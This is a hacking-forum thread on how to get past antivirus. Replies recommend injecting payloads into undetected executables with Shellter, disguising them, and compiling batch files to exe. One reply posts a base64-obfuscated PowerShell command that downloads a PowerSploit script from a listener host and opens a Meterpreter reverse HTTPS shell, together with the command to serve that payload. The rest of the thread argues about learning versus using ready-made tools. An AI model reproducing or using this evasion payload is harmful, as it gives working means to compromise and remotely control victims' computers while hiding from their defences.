Forum Thread: Is There Today a Real Way of Bypassing AV ?

Dunno mate try creating normal payload if u can and try using some of these guides if you are using metasploit/kali:

Here

OR here

It may be helpful and good in many other ways. Don't really know what should i mention about payloads the tutorials up on youtube are hella old. But i just have to say believe in yourself and you will find the right way and remember hacker always finds a way.

You can use Shellter. Pick an exe file that's not normally detected by AV and it will inject your payload in it. I've had great success with it. My favorite thing to do is create my own exe file with Iexpress in Windows and then use it in Shellter. You can have fun coming up with other ideas on how to disguise it.

Encrypted Powersploit payload in .bat compiled to .exe using a batch to exe compiler.
Example:
-------------------------------
@echo off

PowerShell.exe -Exec ByPass -Nol -Enc aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADEALgA2ADoAOAAwADAAMAAvAHAAbwB3AGUAcgBzAHAAbABvAGkAdAAtAHAAYQB5AGwAbwBhAGQAIgApADsAIABJAG4AdgBvAGsAZQAtAFMAaABlAGwAbABjAG8AZABlACAALQBQAGEAeQBsAG8AYQBkACAAdwBpAG4AZABvAHcAcwAvAG0AZQB0AGUAcgBwAHIAZQB0AGUAcgAvAHIAZQB2AGUAcgBzAGUAXwBoAHQAdABwAHMAIAAtAEwAaABvAHMAdAAgADEAOQAyAC4AMQA2ADgALgAxAC4ANgAgAC0ATABwAG8AcgB0ACAANAA0ADQANAAgAC0ARgBvAHIAYwBlAAoA

---------------------------------

It's a reverse_https payload, lhost is set to 192.168.1.6, lport is set to 4444, URL is set to http://192.168.1.6:800o/powersploit-payload

So you have to set up a listener and server, for server :

• cd /var/www/html && python -m SimpleHTTPServer 8000

There's no harm in learning how to hack by using others tools and programs. Yes, your goal should be to be able to make your own, but it's going to be extremely hard if you don't have practice. Btw, Shellter works fine to by pass AV detection.

I'm going to reiterate my point if you missed it. Don't expect to be able to do anything (amazing) if you stick to using other's tools. If you don't start putting some serious effort and time into building your foundations, no matter how many tools you have, you're still like any other script kiddie.

Want to know how many times I've used Kali to achieve something or how many times that I've actually booted my Kali machine? I could probably count it on the fingers of one hand. And how long have I been doing cyber security? More than 3 years, all of which was spent researching on Google, going through many books and papers, practising programming, making my own programs and breaking open other's, learning how a system works... not playing around with tools on Kali.

If you want to do something like understanding AV and bypassing them, this should be your routine. Have the proper attitude, go out and thirst for knowledge. Don't sit back and think this is some easy game hoping that someone will make a magical tool that will hack things for you on the press of a button. Don't complain that hacking is difficult because it is and until you face the reality of it, you're not going to make it far so you might as well give up now. If you aren't hurting, you're not trying hard enough.

This is probably the realest thing that will ever touch Null Byte. There's so many fake claims here and too much false hope as a result of that. But, it's to be expected considering how management is running this place: attract all the kids with clickbait titles to scrape money off ads. Honestly, I don't even know why I'm still here on this website...

Presumably to teach people to see through your eyes and go through a similar journey when learning about this stuff. That's why most of us are here. But everyone learns differently that's why variety is important.

Kali teaches proof of concepts and that's important to a lot of people. You sound like you learn how I learn, but this stuff is computer science and it's fucking hard for some people to see the value in learning. I think everyone deserves a shot, you have to provide a little candy to get people interested enough to sit down and understand or try it themselves. The culture you're talking about is how people grow up once they've understood the core proof of concepts.

First of all Thank you everybody for your replies.

Of course, I have to learn several things. Don't think I'm a 14yo kid who wants to hack his girlfriend. I'm serious and I want to learn seriously. I have just done some tests with the tools that I said but I know very good that hacking is before all learning a lot. I use Kali Linux tools just because I don't have real time but not because I'm not able to write them by myself. Indeed, I have written several tools by myself just for fun in the past..

INT3H you goddamn right ! I'm ready to be good in C and write my own crypter/packer/protector, but I want some tutorials, because even if I can write a payload by myself, I'm a a newbie in AV evasion domain. I hate using some tools like Shellter and Veil-Evasion to do my job. SO I want to learn, but I need some tutorials. I have already read some papers about AV bypassing to see their catching methods.

Thank You Guys.

Keep us updated as you learn!

I CALL BS

You can learn from everything and null-byte is a very good site to entice you. You can't expect from someone to wake up one day and be interested in computer science. All you die-hard hackers out there saying that everyone who is not a seasoned veteran programmer is cursed to be a script kiddie are not helping. Don't say C is king , say try other ways if you succeed very good if you fail you learn which is way better. In this life you win or you learn. We all begin from little things like Kali or metasploit or sqlmap. Hell most of the teenagers who will be the hackers of tomorrow right now want to hack a girl's fb account. Because you didn't have fb when you where a teen doesn't mean that being enticed by that is something bad. FFS